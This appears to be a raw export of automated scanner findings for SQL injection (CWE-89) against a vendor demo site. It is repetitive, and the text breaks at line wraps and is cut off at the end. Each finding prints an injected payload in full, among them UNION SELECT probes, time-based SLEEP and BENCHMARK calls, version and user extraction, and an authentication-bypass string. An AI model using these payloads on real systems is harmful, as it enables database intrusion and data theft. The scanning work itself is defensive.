href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1746\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND true\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1747\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,3,1))='c'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1748\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1749\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1750\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# HAVING 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1751\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT SLEEP(5)\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1752\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or \"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1753\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1754\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1' UNION SELECT 1,2,3--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1755\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1756\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or benchmark(50000000,MD5(1))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1757\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1758\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1759\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# /*!10000 1/0 */\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version 